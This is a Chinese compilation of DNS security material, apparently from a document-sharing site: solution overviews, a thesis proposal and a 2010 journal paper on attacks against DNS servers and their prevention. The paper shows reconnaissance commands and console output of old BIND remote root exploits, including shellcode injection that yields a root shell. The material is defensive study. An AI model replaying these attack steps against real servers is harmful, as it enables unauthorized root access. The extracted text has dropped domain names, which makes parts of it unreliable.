DNS安全防护解决方案一、背景介绍DNS(Domain Name System)是互联网中的一项基础服务,负责将域名转换为IP地址,使得用户可以通过域名访问网站。
然而,由于DNS协议的开放性和安全性问题,使得DNS成为了黑客攻击的重点目标。
为了保障网络安全,DNS安全防护解决方案应运而生。
二、DNS安全威胁与风险1. DNS劫持:黑客通过篡改DNS响应,将用户请求重定向到恶意网站,窃取用户敏感信息。
2. DNS欺骗:黑客通过伪造DNS响应,将用户请求重定向到恶意服务器,进行中间人攻击。
3. DNS放大攻击:黑客利用DNS协议的特性,向DNS服务器发送伪造的请求,导致DNS服务器向目标服务器发送大量响应,从而造成网络拥堵。
4. DNS缓存投毒:黑客通过向DNS服务器发送恶意的缓存数据,使得合法域名解析错误,导致用户无法正常访问网站。
三、DNS安全防护解决方案1. DNSSEC(DNS Security Extensions)DNSSEC是一种基于公钥加密技术的DNS安全扩展,通过数字签名机制保证DNS数据的完整性和真实性。
DNSSEC可以防止DNS劫持和欺骗攻击,有效提高DNS的安全性。
2. DNS防火墙DNS防火墙是一种专门针对DNS流量的安全设备,通过对DNS请求和响应进行分析和过滤,实现对恶意流量的拦截和阻断。
DNS防火墙可以检测和谨防DNS 放大攻击和DNS缓存投毒等攻击,保障网络的正常运行。
3. DNS流量监测与分析系统DNS流量监测与分析系统可以实时监控网络中的DNS流量,对异常流量进行检测和分析。
通过分析DNS流量的特征和行为,可以发现潜在的安全威胁,并及时采取相应的防护措施。
4. DNS日志审计系统DNS日志审计系统可以记录和分析DNS服务器的日志信息,对DNS请求和响应进行审计和分析。
通过对DNS日志的分析,可以发现异常的DNS行为和潜在的安全威胁,匡助管理员及时发现和解决问题。
DNS服务器的安全性研究
DNS服务器的安全性研究I. 概述DNS(Domain Name System)是互联网的基础设施之一,用于将域名解析为IP地址,使用户能够访问网站。
然而,由于DNS服务遍布全球,其安全性成为数字安全的重要话题。
攻击者可以通过操纵DNS服务器或发送假 DNS数据包来代表它们的域和IP地址,从而进行诸如中间人攻击和DNS劫持等攻击。
II. DNS攻击DNS攻击的类型比较丰富,包括DNS缓存投毒、DNS重定向、DNS欺骗、DNS劫持等。
DNS缓存投毒,也称为DNS欺骗,是一种通过欺骗DNS服务器将其缓存中的信息修改为恶意的IP地址来诱使用户访问非法网站的攻击方式。
DNS重定向的攻击方式很少见,但是可以轻松地实现,只要攻击者绑定DNS解析器到其机器,并以此作为DNS服务器,当DNS解析请求通过时,攻击者将解析请求重新定向到野蛮的IP地址或恶意的主机。
DNS欺骗受害者旨在通过骗取其信息来实现攻击。
DNS劫持和DNS欺骗是针对网络通信协议进行攻击的手段,利用DNS服务器并篡改好DNS缓存,就可以在目标计算机中强制实施身份盗窃,将用户重定向到恶意网站等。
III. DNS服务器的安全策略1. 加强网络安全防护加强网络防火墙,避免外部闯入,并且定期检查DNS服务器的漏洞和实施水平,保证DNS服务的正常运行。
同时,要密切关注危险行为,通过DNS解析日志分析攻击事件并及时修复漏洞。
2. 选择信赖DNS服务器选择不受黑客物理或者网络干扰的DNS服务器,提高了可靠性。
工业级DNS服务器可能会支持更灵活的管理和扩展选项,并且可以更灵活地管理使用服务器的用户。
3. 进行区域划分为了保护DNS服务器免受攻击,可以将DNS服务器分成一个内部DNS服务器和一个外部DNS服务器。
内部DNS服务器只为内部机构服务,外部DNS服务器只为外部用户服务。
在DNS服务器内部设置Zones和Slave DNS服务器,以便更好地维护分布式网络。
DNS安全防护解决方案
DNS安全防护解决方案一、概述DNS(Domain Name System)是互联网中用于将域名解析为IP地址的系统,它在互联网通信中起到了至关重要的作用。
然而,由于DNS协议的开放性和易受攻击的特点,DNS安全问题也随之而来。
为了保护企业网络的安全,提高DNS系统的可靠性和稳定性,需要采取一系列的安全防护措施。
本文将介绍一种DNS安全防护解决方案,以应对各种潜在的DNS安全威胁。
二、DNS安全威胁1. DNS劫持:攻击者通过篡改DNS响应,将用户请求重定向到恶意网站,从而窃取用户的个人信息或者进行钓鱼攻击。
2. DNS缓存投毒:攻击者通过发送伪造的DNS响应,将恶意域名与错误的IP 地址相关联,使得用户在访问正常网站时被重定向到恶意网站。
3. DNS放大攻击:攻击者利用DNS协议的特点,通过发送少量的DNS请求,获取大量的DNS响应,从而造成网络拥塞和服务不可用。
4. DNS隐蔽信道:攻击者利用DNS协议的特点,在DNS请求和响应中隐藏传输的数据,从而绕过网络安全设备的检测。
三、DNS安全防护解决方案1. DNSSEC(DNS Security Extensions)DNSSEC是一种基于公钥加密技术的DNS安全扩展协议,它通过数字签名的方式,确保DNS响应的完整性和真实性。
部署DNSSEC可以有效防止DNS劫持和DNS缓存投毒攻击,提高DNS系统的安全性。
2. DNS防火墙DNS防火墙是一种专门用于保护DNS服务器的安全设备,它可以通过过滤和检测DNS流量,阻挠恶意的DNS请求和响应。
DNS防火墙可以有效抵御DNS放大攻击和DNS隐蔽信道攻击,提高DNS系统的可靠性和稳定性。
3. DNS流量分析通过对DNS流量进行深度分析,可以发现异常的DNS请求和响应,及时发现并应对潜在的安全威胁。
DNS流量分析可以结合机器学习和行为分析等技术,提高对DNS安全事件的检测准确性和响应速度。
4. DNS监控和日志记录建立完善的DNS监控系统,实时监测DNS服务器的状态和运行情况,及时发现异常和故障。
DNS安全与防护——DNS安全系统设计与实施的开题报告
DNS安全与防护——DNS安全系统设计与实施的开题报告一、研究背景随着互联网技术的不断发展和普及,DNS(Domain Name System)系统已经成为了互联网基础架构中不可或缺的一部分,负责将域名映射为IP地址。
然而,如今的互联网环境极其复杂,DNS系统也面临着越来越多的安全威胁,包括缓存投毒攻击、DNS欺骗、域名劫持等。
若未能采取有效措施保护DNS系统的安全,将会导致恶意攻击者利用DNS漏洞进行网络攻击,造成不可挽回的损失。
为了保障DNS系统的安全,越来越多的组织和企业开始采取一系列的安全措施,例如限制对公网的DNS服务访问、部署DNS服务器的高级防火墙、采用DNSSEC协议等,但这些措施仍不能完全保护DNS系统的安全,需要进一步研究和实践。
因此,在此背景下,本文将研究DNS安全相关问题,分析DNS系统所面临的主要威胁以及目前常用的DNS安全措施及其效果,进而提出DNS安全系统设计与实施方案,以期提高DNS系统的安全性和可靠性。
二、研究内容1. DNS系统安全性问题的分析与归纳。
本文将结合相关研究和实践经验,详细分析DNS系统所面临的主要威胁和攻击方式,如缓存投毒攻击、DNS欺骗、域名劫持等,对这些威胁进行归纳总结。
2. 常见DNS安全措施的分析和评估。
本文将对DNS系统目前常见的安全措施进行分析和评估,如高级防火墙、DNSSEC协议、DNS缓存污染缓解技术、DNS反欺诈技术等,比较各种措施的优缺点和适用场景。
3. DNS安全系统设计与实施方案的提出。
基于前面的分析和评估,本文将提出一套DNS安全系统的设计与实施方案,包括架构设计、系统模块划分、安全策略制定、系统实施和部署等方面。
4. 实验验证和效果评估。
本文将利用实验和测试的方法验证DNS安全系统的有效性和安全性,同时对系统进行效果评估,对比实验前后的系统性能变化,以及系统的安全性能和可靠性。
三、研究意义本文的研究意义在于:1. 综合分析和总结DNS系统的安全威胁和常见的安全措施,对于深入理解DNS安全问题、指导DNS系统安全防护具有重要意义。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
17杨永,薛琴(湖北警官学院 信息技术系,湖北武汉 430034)摘 要:随着互联网的飞速发展,域名系统作为联系整个网络的纽带,其安全性直接决定着整个网络的安全性,因此对域名系统的攻击模式和安全防护的研究尤为重要。
关键词:攻击;域名系统;安全防范 中图分类号:TP309.5 文献标识码:A 文章编号:1671-1122(2010)12-0017-03Research of DNS Server Attacking and Prevention TechnologyYANG Yong, XUE Qin( Department of Information Technology, Hubei University of Police, Wuhan Hubei 430034, China )Abstract: With the development of the Internet, as a link of Internet, the security of Domain Name System directly determines the safety of the entire network. So the research of the attacking model and security prevention technology of DNS is particularly important.Key words: Attacking; Domain Name System; Security Prevention收稿时间:2010-08-20作者简介:杨永(1988-),男,本科,主要研究方向:计算机应用;薛琴(1980-),女,讲师,硕士,主要研究方向:计算机网络、信息安全。
基金项目:湖北警官学院2009年重点大学生科研项目;湖北省教育科学“十一五”规划课题[2009B042]服务器攻击与防范技术研究doi :10.3969/j.issn.1671-1122.2010.12.0060 引言随着因特网技术在全球范围内的发展,很多企业都建立了自己的网络,并且通过各种不同的方式接入Internet。
Internet上计算机之间的通信通过IP 地址来进行,为了便于应用,TCP/IP 提供了一种字符型的主机命名机制,即域名系统,它可以把便于人们使用的机器名字转换成IP 地址。
对于骨干层、汇聚层的DNS 设备,域名服务是基本的网络服务之一,几乎每个用户的每次访问都会使用到域名解析,因此域名解析的准确程度和响应速度对整个网络的服务质量的影响非常大。
如果DNS 服务器配置不合理,会造成安全漏洞,因此确保DNS 服务器的正常运转和安全可靠具有重要意义。
1 DNS 服务器的主要攻击模式1.1 DNS劫持DNS 服务器软件已开发出40多种,其中很多软件多达20多个版本,每种软件及其不同版本都存在着不同程度的漏洞。
据安全报告统计在因特网互联的DNS 服务器中,10%以上的DNS 服务器具有可以攻击的漏洞。
因此攻击者常通过对漏洞探访实现攻击,具体漏洞扫描流程图如图1所示。
最普通的方式是通过伯克利因特网命名守护程序BIND(Berkeley Internet Name Domain )漏洞进行攻击[1],例如:缓存区溢出漏洞、远程缓冲区溢出、拒绝服务漏洞、分布式拒绝服务攻击。
这里主要研究最新且最致命的一种攻击:远程缓冲区溢出。
图1 漏洞扫描流程图DNS远程缓冲区溢出攻击是允许远程攻击者依靠受攻击的服务器提供的超级管理员用户帐户root特权执行任何命令。
攻击者会设置自动工具来确定运行named 守护进程弱点的服务器。
为确定DNS服务器是否有这种潜在的脆弱性,攻击者控制一个有效域名相关联的DNS服务器,在DNS服务器上设置一个和其域名相关联的子域。
假设攻击者的网络是,子域为hash,攻击者在称为A的系统上运行一个DNS服务器,通过A的/var/named/.zone中添加Subdomain inns hash . attackers.org,并通过named控制接口(ndc)重启named。
攻击者编译相关漏洞发掘程序,将编译出来的可执行代码拿到另一台体系结构配置得当的B系统上运行[2]。
对B系统进行踩点,运行代码如下:[B]# adm-nxtUsage = adm-nxt architecture [command]A vailable architecture :1 : Linux redhat 6.x -named 8.2/8.2.1 (from .rpm)2 : Linux solarDiz’s non-exec stack patch -named 8.2/8.2.13 :Solaris 7 (0xff) -named 8.2.14 :Solaris 2.6 -named 8.2.15 : FreeBSD 3.2-RELEASE -named 8.26 : OpenBSD 2.5 -named 8.27 : NETBSD 1.4.1 -named 8.2.1通过踩点可知B系统为redhat 6.x,运行[B]# adm-nxt 1程序,在B系统上绑定UDP端口53,并等待有弱点的DNS服务器连接,致使目标DNS服务器会连接至伪造的DNS服务器,如图2所示。
图2 攻击网络图攻击者可以通过目标DNS服务器上查询一些基本信息,代码如下:[A]# nolookupDefailt server:Address: 127.0.0.1> server 10.1.1.100Default server:Address: 10.1.1.100> Server:Address:10.1.1.100然后攻击者将正常上网使用的默认DNS服务器改成受攻击者的服务器10.1.1.100。
向受攻击者DNS服务器查询hash.的地址,使得查询监听UDP53号端口的伪服务器。
致使目标服务器连接B,缓存区溢出漏洞发掘程序就会送到上,并给予攻击者root访问权限,即对服务器进行攻击。
1.2 DNS TSIG 缓冲区溢出攻击对于几个极具有破坏力的缓冲区溢出问题,卡内基 梅隆大学的CERT对此进行了总结,发现这些问题主要影响到以下BIND版本[1],如表1所示。
表1 缓冲区溢出问题影响到的BIND版本号BIND 9版本9.2.0、9.2.4到9.3.0、9.3.2、9.3.4到9.4.2BIND 8版本8.2、8.2.1、8.2.2到8.2.2-P78.23-TIA到8.2.3-T9BBIND 4版本缓冲区溢出:4.9.5到4.9.7格式化字符串:4.9.3到4.9.5-P1最具有威胁的溢出与BIND 8的事物签名TSIG(TransactionSignature)处理功能有关。
将远程利用与信息泄露结合将会造成毁灭性后果。
攻击者能够远程从named获取堆栈帧,从而对递归和非递归DNS服务器进行攻击。
攻击者通过端口扫描器Nmap软件[2]对linux DNS服务器检测从而发现漏洞进行攻击,如图3所示。
图3 Nmap软件对端口扫描图扫描结果如下:Starting nmap V. 3.10ALPHA3Interesting ports on (10.10.10.1):Port State Service53/tcp o pen domainTcp Sequence Prediction : Class-random positive incrementsDiffi culty =3340901 (good luck!)Remote operating system guess:linux 2.1.122-2.2.14发现53/tcp打开并提供服务,则使用dig命令确定BIND的版本,代码如下:[roz]# dig @ 10.10.10.1 version.bind txt chaosVersion.BIND. OS CHAOS TXT “8.2.1”得到BIND版本号为8.2.1。
通过漏洞扫描数据库进行对比可知版本号位8.2.1可能存在TSIG漏洞。
攻击者从而对此服务器进行攻击,攻击代码如下:[roz]# ./bind8x 10.10.10.1[*] named 8.2.x (<8.2.3-REL) remote root exploit by lucysoft, Ix[*] fi xed by ian@cypherpunks.ca and jwilkins@[*] attacking 10.10.10.1 (10.10.10.1)[d] HEADER is 12 long[d] infoleak_qry was 476 long[*] iquery resp len = 71919[d] argevdisp1=080d7cd0, argevdisp2 = 4010d6c8[*] retrieved stack offset = bffffae8[d] evil_query(buff,bffffae8)[d] shellcode is 134 long [d] olb = 232[*] injecting shellcode at 1[*] connecting…Linux toast 2.2.12-20 #1 Mon Sep 27 10:40:35 EDT 1999 i686 unknowuid=0(root) gid=0(root)groups=0(root), 1(bin), 2(daemon), 3(sys), 4(adm), 6(disk), 10(wheel)致使攻击者获得root 权限,并对服务器进行攻击。
2 安全防范2.1 提升BIND安全性能DNS 服务器中BIND 的安全性对于整个服务器的安全起着决定性作用,因此从以下几方面对其进行安全防范。
1)named 进程在主流的UNIX (特别是Linux )上启动时就会默认打开,但是很少使用。
因此在DNS 服务器上关闭并删去BIND,来确保服务器的安全。
2)安装最新版本的BIND,并对其相关的漏洞及时打补丁。
3)运行named 应以非特权用户模式,named 以root 特权启动并单独绑定到UDP53号端口上。
正常操作时使用-u 选项降低其特权,并对named 进程以-t 选项改变程式,执行时所参考的根目录位置change root directory (chroot )环境中运行,这样攻击者即使取得访问权限也不能修改文件系统。
4)在named.conf 文件中的options 属性下添加自定义的BIND 版本信息,可隐藏BIND 服务器的真正版本号[3],设置如下:Options{version “who know?”;……}当攻击者通过DNS 服务器查询BIND 版本号时,返回“who know ?”,从而提升了BIND 的安全性能。